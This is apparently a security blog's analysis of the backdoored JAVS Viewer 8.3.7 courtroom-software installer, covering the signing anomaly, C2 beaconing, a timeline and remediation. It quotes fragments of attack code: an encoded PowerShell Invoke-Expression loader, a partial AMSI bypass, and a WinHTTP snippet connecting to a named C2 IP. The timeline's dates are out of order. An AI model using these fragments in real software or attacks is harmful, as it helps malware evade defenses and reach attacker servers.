Cyber Security Blogs
Justice AV Solutions (JAVS), a prominent U.S.-based company specializing in digital audio-visual recording solutions for courtroom environments, recently faced a significant security incident. The supply chain attack involved a backdoored installer for the JAVS Viewer software, version 8.3.7.
This Threatfeed meticulously dissects the nuances of the incidents, leveraging industry-standard cybersecurity practices and contextual technical aesthetics to provide a comprehensive understanding of the breach.
Background Company Profile
JAVS technologies are integral to numerous judicial and governmental environments. Their solutions are deployed in over 10,000 installations globally, encompassing courtrooms, chambers, jury rooms, and various official facilities.
Incident Overview
The compromised version of the software, JAVS Viewer v8.3.7, was identified as containing a malicious installer that grants attackers full control over affected systems. Users of this version must take immediate remediation actions, including re-imaging endpoints and resetting credentials.
Attack Vector Analysis Initial Detection
On May 10, 2024, an investigation commenced following an alert related to the execution of a suspicious binary, fffmpeg.exe, within the installation directory of JAVS Viewer 8. Further analysis traced the infection to the installer, JAVS Viewer Setup 8.3.7.250-1.exe, downloaded from the official JAVS site on March 5, 2024.
Malicious Installer Details
The installer was found to be signed with an unexpected Authenticode certificate issued to “Vanguard Tech Limited” rather than the legitimate “Justice AV Solutions Inc.” The binary fffmpeg.exe, an apparent variant of the GateDoor/Rustdoor malware, executed encoded PowerShell scripts to establish unauthorized remote access.
Technical Dissection Authenticode Signature Discrepancy
The installer and the fffmpeg.exe binary were signed by “Vanguard Tech Limited.” This anomaly indicated a breach in the software supply chain, as legitimate JAVS binaries are typically signed by “Justice AV Solutions Inc.”
Malware Execution Path
Upon execution, fffmpeg.exe established communication with a command-and-control (C2) server, transmitting detailed information about the host system. This included the hostname, operating system details, processor architecture, working directory, and username.
PowerShell Scripts
The executed PowerShell scripts were designed to bypass security mechanisms, such as the Anti-Malware Scan Interface (AMSI) and Event Tracing for Windows (ETW). The scripts then attempted to download additional payloads, further compromising the system.
`powershell
Encoded PowerShell script example
$s = ‘…encoded script…’ $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($s)) Invoke-Expression $decoded `
Exploitation Timeline
Feb 10, 2024: A certificate was issued for “Vanguard Tech Limited.”
Feb 21, 2024: The first malicious JAVS Viewer package was signed with the Vanguard certificate.
April 2, 2024: A Twitter user highlighted malware on the JAVS downloads page.
Mar 12, 2024: The second malicious package was signed.
May 10, 2024: The initial alert led to the discovery of the malicious installer.
May 13, 2024: A second malicious installer was still being served by the JAVS site.
Impact and Mitigation System Compromise
The compromised fffmpeg.exe facilitated persistent remote access, enabling the attacker to execute commands and potentially deploy further malware. Analysis of network traffic confirmed the binary’s communication with a C2 server.
Remediation Steps
Re-image Affected Endpoints: Completely re-image any endpoints with JAVS Viewer 8.3.7 installed.
Credential Reset: Reset all credentials for accounts used on affected systems, including local and remote accounts.
Update Software: Install the latest version of JAVS Viewer (8.3.8 or higher) post-re-imaging.
Detailed Code Analysis Binary Structure
The installer bundled multiple files, including a Dll2.dll, which contained a “HelloWorld” string indicating a possible test compilation.
c // Example of suspicious DLL code __declspec(dllexport) void HelloWorld() { printf(“Hello, World!”); }
Obfuscation Techniques
The PowerShell scripts employed obfuscation to evade detection and disable security features. Deobfuscation revealed attempts to download additional malicious payloads.
`powershell
De-obfuscated PowerShell script
$bypassAMSI = ‘[Ref].Assembly.GetType(“System.Management.Automation.AmsiUtils”)…’ Invoke-Expression $bypassAMSI `
Command-and-Control Communication
The binary fffmpeg.exe used Windows sockets and WinHTTP requests to establish communication with the C2 server, sending host details and awaiting further instructions.
c // Example C2 communication code snippet HINTERNET hSession = WinHttpOpen(L”A Custom User Agent/1.0″, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); HINTERNET hConnect = WinHttpConnect(hSession, L”45.120.177.178″, INTERNET_DEFAULT_HTTP_PORT, 0);
